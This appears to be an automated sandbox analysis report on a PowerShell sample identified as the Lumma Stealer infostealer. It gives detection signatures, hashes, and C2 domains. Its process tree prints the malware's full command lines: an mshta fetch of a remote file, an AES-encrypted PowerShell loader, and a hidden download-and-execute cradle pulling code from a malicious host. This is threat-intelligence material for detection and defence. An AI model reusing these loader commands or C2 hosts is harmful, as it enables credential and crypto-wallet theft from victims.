Edit tour
Windows
Analysis Report
00000.ps1
Overview
General Information
| Sample name: | 00000.ps1 |
| Analysis ID: | 1580648 |
| MD5: | dcca21065d466d02dc563971e2981c0e |
| SHA1: | 5b3e32332d7d1f74261cc238c6e34b4c83b84a32 |
| SHA256: | 52d2dff33cdb7cb2eb4e81e5ac6ad9e828d4df0c7c9a5fc2e96381c7f3cd7843 |
| Tags: | ps1user-zhuzhu0009 |
| Infos: |   |
 | |
Detection
LummaC
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Powershell Download and Execute IEX
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
powershell.exe (PID: 2800 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -noLogo -E xecutionPo licy unres tricted -f ile "C:\Us ers\user\D esktop\000 00.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9) 
conhost.exe (PID: 1908 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
mshta.exe (PID: 3844 cmdline: "C:\Window s\system32 \mshta.exe " https:// scrutinych eck.cash/s ingl7.mp4 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2) - powershell.exe (PID: 2996 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w 1 -ep U nrestricte d -nop fun ction eSNN y($MAvcZ){ return -sp lit ($MAvc Z -replace '..', '0x $& ')};$lq mB = eSNNy ('5C3F827B AC65B5D2C8 965D0BBCE1 ED07B9B678 6A8751F026 D08EFD0A82 5F531A8D09 1C0ECDD11B 3934B46C62 6B865735BA B41B512BE1 5DE11F5E12 515F7078B3 1EE8399C0E 805B1F986B 48CD1FE4A4 708FA30B93 CA4F7E812C A54A8793D6 2D3598E2B9 5AF0842B9C 9750010609 AF477848F4 D131B95466 1400575166 055C03EF1B 5DE596CF55 C542063D3F 91CE19CE97 925E58F6C3 2246A89012 9F4332D508 85100C3526 774D0074EE C5D7A612D6 4456E89E2A AD35E8F4DC B634817B8F 6E0AC4FA60 5341C50069 355F250ADB 57D33D199E 78EDCF8029 4758E47CB5 22EDFFFE73 CC1B919EF1 6AF41E32F5 B6A9BF909A E30CEB1071 E2D14015FB 77F6298FF2 B02FEBA7B2 BEE205F03C F88FF6F6BE BEEC0309A6 D27D56500B 79ADD62DD9 D50A9590F0 7C9425FF02 C2062F0E34 44952489CE 539FE357B0 44D8F72560 487A102CC1 57F9E4E5B3 9D9C8DEF45 655607C7A2 FDB595ECBD 612595FE99 5C4B043F89 55A8F51FB0 18D2638C4F 3A04E4CE1F 6F77607E28 264761F851 7127E32F9F 8D15956586 1F352D53ED 7157874F26 3F52A7E102 5A408CACC8 B208E7F777 6300701055 FD3D6C30CA 49783C8224 71E5B37491 DA64E22ECA 5ACEAE2C26 465A1465F8 774B553629 8C89DBC028 CD0AE43DBA BB7B1179BD 528CA17B1C 6D0B390408 ECE7927FEA A32EA4FAF5 B6249A55C0 BB8FCE630B BE9577950A 1C82CEB3F5 B1CC3B4D16 D0DD85009C 2C1593600E 9AD124BD3E 71F96E9ECC 581D41A94B 73C3A20BF4 550FA7E087 28A080D7A6 A09FF218A0 A37CDF4EF3 F6A50CCC9D DEE0D24287 949B372601 CA8769A110 9242856694 1E5E81DC73 4A344A92E5 B54939A7B8 08EA27414A 69BECE5035 6ADA32AF76 C66A7EED81 FF79A3208E A6CA1E28D5 4700AB34FB 6270B5B4EC 13DA50EBF0 B9BBAB0238 6114220327 2D6112A5A6 D9726B68EF 7940318464 78BC822C4C 0391F73AD6 DD169DCDF3 3D909E115B CFB9021A0D 74ABB58303 2AC14EDAF5 63EB221F82 DBE7081574 0F8F4F65B3 993B4805F2 F8DED176EF 03650D5BA2 D74E1919BE CB701A86B2 332083BFBE 1C6D8903AB 78E68721C7 7F780C3596 EDC51E77') ;$jAMAa=-j oin [char[ ]](([Secur ity.Crypto graphy.Aes ]::Create( )).CreateD ecryptor(( eSNNy('494 46F52676D7 3564347616 14A6E6878' )),[byte[] ]::new(16) ).Transfor mFinalBloc k($lqmB,0, $lqmB.Leng th)); & $j AMAa.Subst ring(0,3) $jAMAa.Sub string(129 ) MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 5812 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7176 cmdline:
"C:\Window s\SysWow64 \WindowsPo werShell\v 1.0\powers hell.exe" -w hidden -ep bypass -nop -Com mand "iex ((New-Obje ct System. Net.WebCli ent).Downl oadString( 'https://d ma.sportst alk-musicl over.com/s ingl7.pst' ))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 7184 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 8032 cmdline:
"C:\Window s\SysWow64 \WindowsPo werShell\v 1.0\powers hell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
svchost.exe (PID: 4420 cmdline: C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| Lumma Stealer, LummaC2 Stealer | Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. | No Attribution |
{"C2 url": ["necklacebudi.lat", "hushedocenahu.click", "crosshuaht.lat", "rapeflowwj.lat", "grannyejh.lat", "energyaffai.lat", "sustainskelet.lat", "discokeyus.lat", "aspecteirs.lat"], "Build id": "yJEcaG--singl7"}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security | ||
| JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
| JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems), Tim Shelton: | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||